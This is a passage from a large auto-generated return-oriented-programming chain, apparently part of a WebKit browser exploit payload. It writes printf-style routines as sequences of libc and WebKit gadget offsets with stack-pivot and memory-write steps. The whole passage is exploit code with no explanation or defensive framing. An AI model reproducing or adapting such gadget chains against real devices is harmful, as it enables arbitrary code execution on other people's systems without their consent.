set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+561880, //L12466 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+561896, //L12467 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+561848, //L12464 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+561864, //L12465 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12464: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L12465: db([0, 0]); // 0x0 
set_gadget(libc_base+144605,); //pop rdi //L12466: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12467: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+561976, //L12468 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+561992, //L12469 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L12468: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12469: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+562104, //L12470 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+562136, //L12472 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+562120, //L12471 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12470: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12471: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12472: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+562240, //L12473 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+562256, //L12474 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L12473: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12474: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+562376, //L12475 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+562360, //L12476 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L12476: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L12475: db([0, 0]); // 0x0 set_gadgets([ libc_base+764760, //pop rsi ropchain+562464, //L12478 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+562448, //L12477 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L12477: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12478: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+562568, //L12479 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+562584, //L12480 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L12479: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12480: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+562704, //L12481 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+562688, //L12482 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L12482: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L12481: db([0, 0]); // 0x0 //_vprintf_: set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+562776, //L12484 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L12484: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+562840, //L12486 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L12486: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+562912, //L12487 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L12487: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L12489: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+563032, //L12492 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+563016, //L12490 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12490: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12492: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+563176, //L12495 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+563144, //L12493 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+563160, //L12494 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12493: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12494: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12495: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, 
rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+563256, //L12496 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L12496: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L12498: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+563376, //L12501 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+563360, //L12499 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12499: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12501: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+563520, //L12504 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+563488, //L12502 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+563504, //L12503 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12502: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12503: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12504: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L12505: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L12506: db([1, 0]); // 0x1 set_gadget(libc_base+763368,); //pop rcx //L12507: db([1, 0]); // 0x1 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // 
-0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+835093, //sub rax, rcx ; sbb rdx, rcx libc_base+764760, //pop rsi ropchain+563792, //L12509 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+563808, //L12510 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+563776, //L12508 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L12508: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12509: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12510: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+563904, //L12512 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+563888, //L12511 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L12511: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12512: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+564000, //L12514 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L12513: db([4294967295, 4294967295]); // -0x1 set_gadget(libc_base+759608,); //pop rax //L12514: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608, //pop rax //L12515: ropchain+167544, //__out_char libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608, //pop rax 
//L12517: ropchain+564160, //L12516 libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+782311, //pop rsp ropchain+317712, //__vsnprintf //L12516: libc_base+853989, //mov rax, rcx libc_base+764760 //pop rsi ]); db([4294967256, 4294967295]); // -0x28 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+564304, //L12519 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+564320, //L12520 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+564288, //L12518 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L12518: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12519: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12520: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+564432, //L12521 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+564464, //L12523 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+564448, //L12522 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12521: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12522: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12523: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+564568, //L12524 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+564584, 
//L12525 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L12524: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12525: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+564704, //L12526 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+564688, //L12527 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L12527: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L12526: db([0, 0]); // 0x0 set_gadgets([ libc_base+764760, //pop rsi ropchain+564792, //L12529 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+564776, //L12528 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L12528: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12529: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+564896, //L12530 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+564912, //L12531 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L12530: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12531: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+565032, //L12532 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, 
[rsi] libc_base+764760, //pop rsi ropchain+565016, //L12533 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L12533: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L12532: db([0, 0]); // 0x0 //_vsnprintf_: set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+565104, //L12535 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L12535: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+565200, //L12536 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+565232, //L12539 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+763368 //pop rcx ]); //L12536: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L12538: db([40, 0]); // 0x28 set_gadget(webkit_base+568675,); //pop r8 //L12539: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+565336, //L12542 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+565320, //L12540 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12540: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12542: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+565480, //L12545 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+565448, //L12543 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+565464, //L12544 webkit_base+660161, //mov [rsi], rax ; mov al, 
1 libc_base+763368 //pop rcx ]); //L12543: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12544: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12545: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+565560, //L12546 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L12546: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L12548: db([32, 0]); // 0x20 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+565680, //L12551 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+565664, //L12549 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12549: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12551: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+565824, //L12554 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+565792, //L12552 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+565808, //L12553 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12552: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12553: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12554: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+565904, //L12555 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 
libc_base+763368 //pop rcx ]); //L12555: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L12557: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+566024, //L12560 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+566008, //L12558 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12558: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12560: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+566168, //L12563 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+566136, //L12561 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+566152, //L12562 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12561: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12562: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12563: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+566248, //L12564 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L12564: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L12566: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+566368, //L12569 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+566352, //L12567 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12567: db([0, 
0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12569: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+566512, //L12572 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+566480, //L12570 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+566496, //L12571 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12570: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12571: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12572: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608, //pop rax //L12573: ropchain+161664, //__out_buffer libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608, //pop rax //L12575: ropchain+566664, //L12574 libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+782311, //pop rsp ropchain+317712, //__vsnprintf //L12574: libc_base+853989, //mov rax, rcx libc_base+764760 //pop rsi ]); db([4294967256, 4294967295]); // -0x28 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+566808, //L12577 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+566824, //L12578 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+566792, //L12576 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L12576: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); 
//pop rdi //L12577: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12578: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+566936, //L12579 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+566968, //L12581 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+566952, //L12580 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12579: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12580: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12581: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+567072, //L12582 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+567088, //L12583 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L12582: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12583: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+567208, //L12584 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+567192, //L12585 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L12585: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L12584: db([0, 0]); // 0x0 set_gadgets([ libc_base+764760, //pop rsi ropchain+567296, //L12587 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 
libc_base+764760, //pop rsi ropchain+567280, //L12586 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L12586: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12587: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+567400, //L12588 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+567416, //L12589 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L12588: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12589: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+567536, //L12590 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+567520, //L12591 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L12591: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L12590: db([0, 0]); // 0x0 //_fctprintf: set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+567608, //L12593 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L12593: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+567672, //L12595 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L12595: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi 
